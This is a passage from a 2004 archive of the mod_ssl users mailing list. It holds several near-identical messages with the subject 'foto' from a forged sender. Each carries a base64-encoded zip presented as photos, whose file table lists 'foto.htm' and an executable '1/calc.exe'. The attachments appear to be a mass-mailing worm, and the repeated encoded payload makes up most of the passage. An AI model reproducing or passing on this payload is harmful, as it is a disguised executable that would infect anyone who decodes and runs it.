a+viYU/oOmekLq64roT/HGuVc01cArpr6zmthgZB87ik+btHc/za06ibRZyhmzXUo6bKH5c2
RoewCOUmxmEJH92xqDJcQ4iFjV1QclXLd5i51W7jYg2ERh5XG3z5FYIpo1bVOadgiIo57lRz
xPL1DFcf4o6DjMsZfPVdy8OuM+ATRS0nJ233iKdgXV9lkTS0pmoiK172Fvy5EH9zTHduV0wE
qnYiKFIbPipNkE6G1c+MsEw6NcXM0bAE3pCeSwSvryEtfIQlg0MI9MVfzTCIe69fbv6PUlPw
9y23tXa1rm5rbbu3bU+b0pZvG2g/0/5QLBd7PPbl2Hdiz8SOx07HXo39JPYb8Vj8nnhnfChu
xO34WPwP4k/E/zg+Hf9K/FD8G/Fvxg/Hj8Sfic/En4ufif8o/lL81fhP46/H34r/PD4Xr9vU
sGn5ppWb1mx6rwd9I5UTwmYDIYR9dVmnd3b3DSR6k4PbdUReDiKswfAXgMFOz0a0Uf6BYLDX
C9+V9/bZSnHAVMmCl/8FD+q7grcH8YNBcqxc5L8YoBT8fNFLuRcY/qgh3ujDN/vtYNjF99pS
78f0P1BLAQIUABQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAAAAAAAEAIACAgQAAAABmb3Rv
Lmh0bVBLAQIUAAoAAAAAAIqyITEAAAAAAAAAAAAAAAACAAAAAAAAAAAAEgDAQXwAAAAxL1BL
AQIUABQAAAAIAKa2ITGwdINuVhAAAAAyAAAKAAAAAAAAAAAAIgDAgZwAAAAxL2NhbGMuZXhl
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------afwrnorihyweroodirpd--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 05:18:28 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B3113A8995; Wed,  1 Sep 2004 05:18:28 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from sky.net (66-65-73-8.nyc.rr.com [66.65.73.8])
	by master.modssl.org (Postfix) with SMTP id E46BAA8943
	for ; Wed,  1 Sep 2004 05:18:21 +0200 (CEST)
Date: Tue, 31 Aug 2004 23:18:24 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------aapmmloxvlzpmamgwezh"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------aapmmloxvlzpmamgwezh
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------aapmmloxvlzpmamgwezh
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

UEsDBBQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAZm90by5odG2zySjJzbHj5bLxd/JydQ5R
8HP0dbVVj1BXcPZxDA72dLFVd/YBUlaGJqbmFiaGZrqGQIBGGBqaALGRMVCTv4urk2Mw0ARD
/eTEnGS91IpUdZDp+lBrAFBLAwQKAAAAAACKsiExAAAAAAAAAAAAAAAAAgAAADEvUEsDBBQA
AAAIAKa2ITGwdINuVhAAAAAyAAAKAAAAMS9jYWxjLmV4Ze1af3BUx33fEzKWjQJqAiWmaSwI
dokbnYV0R3FCG52lk2Ei4KyTEDay4d291b13evf2+f2QdGrcypZJQzU4mubndGj+SF1PJk2Z
tIUp8UyCMNQ2DZlCxtN67I6HkIz7YlzXY2isaVWun933Tpy4PZk0zXjcYeH7fbvf7+53v/vd
X9/vnrY/SEiEEFIHKJUI6SBBKn+P9PxwLamReJ1UkpCeyBLyfNemRJl+nqyILIvc1EjqUYgG
tAc+CNQEaA5bNgWd1odtyl+yL1Rm/tMU1J3/zn9E0iBvSy0Ff5kEudoi7KhLx1x8n1oSKsQH
UFcl4nzUVhVXIeRMXUAQ9ZYurNeB/9GgGrn0caBWwAbArVX1Zv43Q1ks9U+9sWsgPfVow5TX
OOD/Hkazf2bavWP6i3PtM5OnS28fnvg0cX9tIO2vBuvAUs5s+KuLF47xNbNn78Onn23gIiZP
zeYJ/tUBlnCzdZS8Bn8GYz6QnOvw6k8/2wj2weRsquQ1lbzGkjfnz4HLv0/iK8TxSkKWn9bO
7uog2qNA/p5SqbRsZsUT/0h49YY80T4JE/p/GsjeD87fCk6j/z1Bupyv1/iETJe8y3neQWkV
F3YgOdv+yrIZ9w857bJQYVYw/wVM0PuC3n4bMjQLuZR/J7IH+9/q5Q1mU3x4ov5LQtgbaLI2
Xyp5b/hRXi/pp3j+PMYx9ZDPs38X4Qtogoh2QVcvoikf8SFe6+TFNdpPeZf/gBKkNWpNv4Vx
vYzSxct75u06dzA5l9JiomWD/xoX+rMBtDqL3HRHShTyEViFtAbCT0cCsx6NcIvWcymPnXrx
Sqn0/P6XgDdEiJgo/+PIHNjPGQcFI1U6ygv+fYE6Gw/un+NUbR3XcVAQvYap/edBPH1yYZM1
XOcfhIXjmI32mdMntfp5XS+ApC2DfkHxFs4Q3Dd3Q3nif4dwnQRTkPzHeANUmPBnIVKr47k3
eU60ElZ7kldZzWWK4lFenCALuOROoHXzVfr/my8kd43/OiT9+fldIb0U51l/Elyochsanind
sa8ZjDt2C9wncJPAKwX+sMAfEbhZ4PUCbxD4EwIPCtwqcEzgzQJvEbhD4C6BtwrcI3BK4AaB
icD1wL/KdGgdId8GPLkuKMdw2qcADwNswOcBhwCHAacAFwCXAfWovwawDrAZ0AVIAQYBd4K/
BvAioDG8PY40X+1TQ50mlJ+qoH2f919Rfi90XEM6DebQrYqpGpSsJ53MKnbrBk3gQO60qeLS
oLQtLPUxZmjUsNrb0qZiORrDhTBBkmO6m7JZljoO+XdyH3U5oZOptE9DK5XcHAFtO1M9Q4jb
oRQgktxylRr0D9rtnMZFJVTV5uLIFk5JFx2XFrp0m2ZdZhcT5KlID1PUHj1jK7xIzkV2WtQs
6/BqJMy1t3XrtgMdz1+l7OC3WKwuTV0xNNe19YznUgdS9tWlDUot8oW6AUV3u5md1s2cQXdm
8uiXfL1uwNYDg5CjdYbj2lnFRavvBvmCpSfIcZE3qAn6MLVNarS3RVXDIMRzqF3OO5oxqli6
KExEemlOTMJnaJFMipIwNYoJcpiXoeouxfBocgxSFXUETcuSbqRfPI1S21GdKB2jZFBlts7c
IJ9THxkaFdntD04T7uRwx4V7iMfClh3XIX0CsPz2Z5aTI7f8cO2xCHzJPk13mi2b5Wyl0JxV
TJO5zRnabHtms242d+1MNxewVaIf+MCt60MZgYdZT55b4GEuXys8zAYyf2rctYpUeJjILeZh
ohD/xvV5mNOQN7bYIFPvwq+VIHd6EXbZw/zo0lChBlIxiHkR8x5mXX1AEN5l48J6HRUe5kO/
TgIP84MhLKw3E7WpwbI4cTkBYxNGWl9V797rGeKN9P5P7TNTZ89dyN/ywLnXnZunH3u7efLY
v124dGDl/q4EaboyM+2dP8mDiKlkwztnEURMbW/6yW1TZ0+83tC2dPoOnBdkql5UbX+2+8K/
vnP24dDNf+yUW+JOKce8GxE/LCnHDxPc232jPogf3M4gdhAO3sH9YyXuesLFbb6Ju7qzZcpR
Lsq3gA4IqZOPzhLv73nFP4OgKUELPeLJU5d5Bx6vi4hhQdcznPNIueu7REwjPOqT9SQMYvL1
B5OXhQon6gNv+1P189725Km30u2vSGT+ZihzxRN/REgocy1ov8t32GdN0dEcJz4o6SjGafM1
NofdrhffBv/bV/hAZq/qujoU8VaFiFXcCsnZTyUvr/jSSU74HI71L+6ZDxJ6xHxw/CVhZ55L
+VOoNPm9FPI32Rnt02SFmKnSqq4kacJoEBXUcwn5ddBDRDlbwYCf3ZI62H++Nx9JlVb1gDK1
cv13bxbDvjCXL+Xr86Xe0ioc7U2lVX0c85Y8E2qT3jXAx3WniEfd9qmXggi1Mii9DUGpXyfi
kpv3PiwipgNLJ5+rv/iyiCZDEmQNzPHG2xtP/KyufebSXyI3+eMll761l7P5WEQv0DhyUjsL
Ff0fQ+jF1/iiFvFmPuL/hejGXY4oMOW/gIL/mbproquBa8KrLXXy8GpfIOre4ziCmwbCIMv/
XEBdVjrK4yv/MVi7YqjePy+UsY4r+ExYOBHhW3Tvaa6vX0DDvOrfziu8Pb8eRQzJR6p980Ok
SQz5qzw6PBnshOeTs/x+EVFzvsN/OiKWaRCsz6HufwnCZegXm0rOTW2tvx+xdcP9/jnQHwB1
6f3+GWRDMWE7BNn+CzwufIHn/iYMSlNXg9IgWtuNKffVSDnXGAnWc5bv5H1XeEiWD1hiKvzH
gzi0Maj9hblS6SLmNJQ4EISHgvUKF/4JnDpBsRmM47GNsLiwLZRenb9pXrYGxwJm8e9CrUqz
/0gjX90W8c9B1sUTeyXmfHplaM6tpGzORxsj3gaNbw7tBx3ouRVxpfZ9nvsatPUNPmXf+k+g
v4Ye888ePOLEGBE7ctwgcKPATQKvFPjDAn9E4GaB1wu8QeBBgVsFjgm8WeAtAncI3CXwVoF7
BE4J3CfwboE1gT8v8GcFHhP4CYEnBLYEhrfRdO1tcSP9f0uvfSz4Hgmj6/OANwFzgOWIpD8K
2BRG10+DlsHXAjwO+BPA1wGHAacA/wR4FfA24AqgF/C1MPpeH/ZzKvxq+PYBDgEeB2wJ6U0V
79G3gobdQqwKWuvHglfhiQraMdCwislYBe1l0LCOSUMF7ee8j+b3hx0WvlYsfKHoLr9QBE8O
i75YpEkXNWi55X/wFwueTevjVPIC8SCn7ELQqDOTh+AZXh7QTZWNOhVPEiQXuc9gGcVIGDyY
MMNSt00p+aXfK96J9GJU4umBtPC3i6Sp7hwKyvK3jE1laorppkvtq68bWl0ftQu6CeOUFaj5
tlH7DeMSSbs2/m9LLHzPuDW0bb9tdCpZjSZNV4y4iXTDZGL+yizyIUETQ76m+hrB4UO/Vs7v
k218OCZ1MQudzDRhf6qmXYyGjOqmDobQYyPp7+3pYqOmAcP3sWCqiWcbBWYGIzBJGgvDSI7R
LGyWIOmtyZ6eGw8rNxJJ7Np9f3+iN5qEq5RMdyZ2bN3RJwr9qft6E13JgFNZK7FroD/VhcUT
FFIoiGxn97ZEf9e2cuuuRF9SZHeEkkRhe2cFJ9EXFEK5lZz+vp19vYnOq6UKZve23uRAoqdH
IqOnv0zv6h1I3tufGpgX0LVzYEe1Pjv7+1I704HO2zrT6f5Uasd8CYV74hWWCQtEc13rk3ff
PTo6GmXDbsZm2HB21PbuzkTzVq6SnVcK1EEFbF07mmWF6hoZr5hVbCpnuhodZQXFlHM1qhiu
BhZ1NXkNSynGY9BayswxQ83hKHHkbId5hq2buWouxSliKTmJzgXmma6imziccjKxnMxGqG3o
QzVGvEBCW3WdEZ1fTUPM5uo5UWbnFvL59YemRebBJlVclRlG0WLWL6z5AnashsHEw30cN0LW
xYzr2RqGXXxNYMqZaeBoH2W2Ws3O2kU2hDqOpeMSq+bjpvNsxbBsJul9RLddTzGymmdna6yY
0SIkY8HpihW1jGq+otstaGjhFrFFD1HFrq7FVDoCA7gjLOoMS4TYtuIU5fItpuqOlOUUcsN2
VsqC7+HSMQu9WRnpPoTJXd1xa/JNxVZZNJOhUvHesGVIGXrGMjxHOkY3OzJKM+5ITRttvCcW
kwrF1I0Pw98a1qvYcOmyw1E6InwCIVkmwBB2rzVS6hrwKaM5VZFb2VXsloIyFtXdaqbKCh6X
IGmmGyN6FrpXs7JewVJsJYs+WVWFtMVstwfLXcYMBJtZ7JVabGyGcSU6ZOvDTDqcYS/j8h0J
U8msQU14gmPRTLEWq6UgZapKiw2RWRbVJZ1SBVY0VUVs4Ogwla033WYZHSvEsZRsjbOQZV1l
RD5LhpLVXVdR9SGd2dQc95ihSGfMhGHAsvTRGgaiRsbwoja1vIyhD8t7Yy6LGiOSbYe7ycY6
HJfcPDaDkyzjDDFMiLSb37HoIjNJjSxO/WKNuwy2xh5XMWW1TrbrqFLAvOFMlvU+oiBIwM3T
gtWPk3lYvgsQ8mDr5Qx9VM9WHyUFHbvAoNGRTVWG4deWSguyQ1tcGcE5IzOn45kZT615FpiK
ylR7XH6uWdkWLVikhainSPjMcIzosOIy6XjErIy5Ni3QFoyM+wpGTiooFscJ4DoqtZjkzgru
fZdahuI41NworzFkK3xyNNnpPlK+jKRXissK+iOeXH89a/GjVL7gsFRaHLdo1NifuomTVHr4
Q6Qr30qKOyodQo4xNcOKUSwC6UE17OG8rjVPOCVwakep5KDh8yu/TscVRxHH2Ci15Xexq8Pb
ki+64aKhj9RYVEWbXzC60pJhLKdXV2JYK4r8BKB2rbt/lI7Lt9wiE5ij8LBwuqsSu4idjtNA
PgTFzDJmjTv89o4WJdNhebbjwf+yR+Qbh9pD8AJbMlTx3CImXTIxzBjH4vJUnUn5BVrI8FWt
4O6T8d+lCwcuqI79WyzUiExMF9OUkS9sg7meo7Kc3OJ2S0YZV2rEO57jFhQ3q8l80+uqsHFz
a+viYU/oOmekLq64roT/HGuVc01cArpr6zmthgZB87ik+btHc/za06ibRZyhmzXUo6bKH5c2
RoewCOUmxmEJH92xqDJcQ4iFjV1QclXLd5i51W7jYg2ERh5XG3z5FYIpo1bVOadgiIo57lRz
xPL1DFcf4o6DjMsZfPVdy8OuM+ATRS0nJ233iKdgXV9lkTS0pmoiK172Fvy5EH9zTHduV0wE
qnYiKFIbPipNkE6G1c+MsEw6NcXM0bAE3pCeSwSvryEtfIQlg0MI9MVfzTCIe69fbv6PUlPw
9y23tXa1rm5rbbu3bU+b0pZvG2g/0/5QLBd7PPbl2Hdiz8SOx07HXo39JPYb8Vj8nnhnfChu
xO34WPwP4k/E/zg+Hf9K/FD8G/Fvxg/Hj8Sfic/En4ufif8o/lL81fhP46/H34r/PD4Xr9vU
sGn5ppWb1mx6rwd9I5UTwmYDIYR9dVmnd3b3DSR6k4PbdUReDiKswfAXgMFOz0a0Uf6BYLDX
C9+V9/bZSnHAVMmCl/8FD+q7grcH8YNBcqxc5L8YoBT8fNFLuRcY/qgh3ujDN/vtYNjF99pS
78f0P1BLAQIUABQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAAAAAAAEAIACAgQAAAABmb3Rv
Lmh0bVBLAQIUAAoAAAAAAIqyITEAAAAAAAAAAAAAAAACAAAAAAAAAAAAEgDAQXwAAAAxL1BL
AQIUABQAAAAIAKa2ITGwdINuVhAAAAAyAAAKAAAAAAAAAAAAIgDAgZwAAAAxL2NhbGMuZXhl
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------aapmmloxvlzpmamgwezh--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 05:36:47 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 46311A8995; Wed,  1 Sep 2004 05:36:47 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from moya-gelezka.com (80.178.189.183.forward.012.net.il [80.178.189.183])
	by master.modssl.org (Postfix) with SMTP id 7654DA8943
	for ; Wed,  1 Sep 2004 05:36:40 +0200 (CEST)
Date: Wed, 01 Sep 2004 06:34:55 +0200
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------pddfcrgjsnxjstdrnkpg"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------pddfcrgjsnxjstdrnkpg
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------pddfcrgjsnxjstdrnkpg
Content-Type: application/octet-stream; name="fotos.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="fotos.zip"

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
UEsFBgAAAAADAAMAngAAABoRAAAAAA==

----------pddfcrgjsnxjstdrnkpg--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Sep  1 05:52:05 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 46B27A8995; Wed,  1 Sep 2004 05:52:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from INDPNDNC-TWP.net (pm900-20.dialip.mich.net [207.74.177.174])
	by master.modssl.org (Postfix) with SMTP id 09FE6A8943
	for ; Wed,  1 Sep 2004 05:51:57 +0200 (CEST)
Date: Tue, 31 Aug 2004 23:51:51 -0500
To: "Modssl-users" 
From: "Rse" 
Subject: foto
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------obaeuoogwcpkvzpheodz"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------obaeuoogwcpkvzpheodz
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: 7bit


foto







----------obaeuoogwcpkvzpheodz
Content-Type: application/octet-stream; name="foto.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="foto.zip"

UEsDBBQAAAAIAIKyITFhTJoyVgAAAG8AAAAIAAAAZm90by5odG2zySjJzbHj5bLxd/JydQ5R
8HP0dbVVj1BXcPZxDA72dLFVd/YBUlaGJqbmFiaGZrqGQIBGGBqaALGRMVCTv4urk2Mw0ARD
/eTEnGS91IpUdZDp+lBrAFBLAwQKAAAAAACKsiExAAAAAAAAAAAAAAAAAgAAADEvUEsDBBQA
